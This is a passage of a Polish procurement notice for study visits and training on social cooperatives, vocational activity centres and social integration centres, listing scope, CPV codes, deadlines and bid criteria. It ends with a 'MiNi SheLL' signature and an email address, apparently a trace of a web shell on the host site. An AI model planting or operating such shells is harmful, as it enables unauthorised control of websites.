<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV:2 wizyty studyjne z przewodnim tematem tworzenia i funkcjonowania spółdzielni socjalnych zawierające jako główne miejsce realizacji Spółdzielnię Socjalną Usługowo-Handlowo-Produkcyjną w Byczynie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2 wizyty studyjne z przewodnim tematem tworzenia i funkcjonowania spółdzielni socjalnych zawierające jako główne miejsce realizacji Spółdzielnię Socjalną Usługowo-Handlowo-Produkcyjną w Byczynie. 
Oprócz głównego miejsca realizacji Wykonawca zaproponuje co najmniej 4 dodatkowe miejsca/podmioty, w których zaprezentowane zostaną dobre praktyki w dziedzinie partnerstw na rzecz włączenia społecznego, stosowania aktywnych form integracji społecznej i/lub ekonomii społecznej, takich jak spółdzielnie socjalne, centra integracji społecznej, zakłady aktywności zawodowej, warsztaty terapii zajęciowej, stowarzyszenia i fundacje oraz inne instytucje działające w sektorze ekonomii społecznej lub realizujące działania w partnerstwie w obszarze polityki społecznej.
W drugim dniu wizyty Wykonawca zorganizuje praktyczne szkolenie z zakresu tworzenia i funkcjonowania spółdzielni socjalnych.
Maksymalna liczba uczestników w grupie: 10 osób.  Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 55.11.00.00-4, 55.30.00.00-2, 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie trenerów prowadzących praktyczne szkolenie z zakresu tworzenia i funkcjonowania spółdzielni socjalnych - 20</li>
<li>3. Doświadczenie Wykonawcy w realizacji wizyt studyjnych odpowiadających swoim zakresem tematyce wizyt studyjnych objętych przedmiotem zamówienia - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V: 2 wizyty studyjne z przewodnim tematem tworzenia i funkcjonowania zakładów aktywności zawodowej zawierające jako główne miejsce realizacji Zakład Aktywności Zawodowej OPOKA w Kluczach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2 wizyty studyjne z przewodnim tematem tworzenia i funkcjonowania zakładów aktywności zawodowej zawierające jako główne miejsce realizacji Zakład Aktywności Zawodowej OPOKA w Kluczach.
Oprócz głównego miejsca realizacji Wykonawca zaproponuje co najmniej 4 dodatkowe miejsca/podmioty, w których zaprezentowane zostaną dobre praktyki w dziedzinie partnerstw na rzecz włączenia społecznego, stosowania aktywnych form integracji społecznej i/lub ekonomii społecznej, takich jak spółdzielnie socjalne, centra integracji społecznej, zakłady aktywności zawodowej, warsztaty terapii zajęciowej, stowarzyszenia i fundacje oraz inne instytucje działające w sektorze ekonomii społecznej lub realizujące działania w partnerstwie w obszarze polityki społecznej.
W drugim dniu wizyty Wykonawca zorganizuje praktyczne szkolenie z zakresu tworzenia i funkcjonowania zakładów aktywności zawodowej. 
Maksymalna liczba uczestników w grupie: 10 osób.  Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 55.11.00.00-4, 55.30.00.00-3, 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie trenerów prowadzących praktyczne szkolenie z zakresu tworzenia i funkcjonowania zakładów aktywności zawodowej - 20</li>
<li>3. Doświadczenie Wykonawcy w realizacji wizyt studyjnych odpowiadających swoim zakresem tematyce wizyt studyjnych objętych przedmiotem zamówienia - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część VI: 2 wizyty studyjne z przewodnim tematem tworzenia i funkcjonowania centrów integracji społecznej zawierające jako główne miejsce realizacji Centrum Integracji Społecznej w Skarżysku-Kamiennej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2 wizyty studyjne z przewodnim tematem tworzenia i funkcjonowania centrów integracji społecznej zawierające jako główne miejsce realizacji Centrum Integracji Społecznej w Skarżysku-Kamiennej.
Oprócz głównego miejsca realizacji Wykonawca zaproponuje co najmniej 4 dodatkowe miejsca/podmioty, w których zaprezentowane zostaną dobre praktyki w dziedzinie partnerstw na rzecz włączenia społecznego, stosowania aktywnych form integracji społecznej i/lub ekonomii społecznej, takich jak spółdzielnie socjalne, centra integracji społecznej, zakłady aktywności zawodowej, warsztaty terapii zajęciowej, stowarzyszenia i fundacje oraz inne instytucje działające w sektorze ekonomii społecznej lub realizujące działania w partnerstwie w obszarze polityki społecznej.
W drugim dniu wizyty Wykonawca zorganizuje praktyczne szkolenie z zakresu tworzenia i funkcjonowania centrów integracji społecznej. 
Maksymalna liczba uczestników w grupie: 10 osób.  Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 55.11.00.00-4, 55.30.00.00-3, 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie trenerów prowadzących praktyczne szkolenie z zakresu tworzenia i funkcjonowania centrów integracji społecznej - 20</li>
<li>3. Doświadczenie Wykonawcy w realizacji wizyt studyjnych odpowiadających swoim zakresem tematyce wizyt studyjnych objętych przedmiotem zamówienia - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com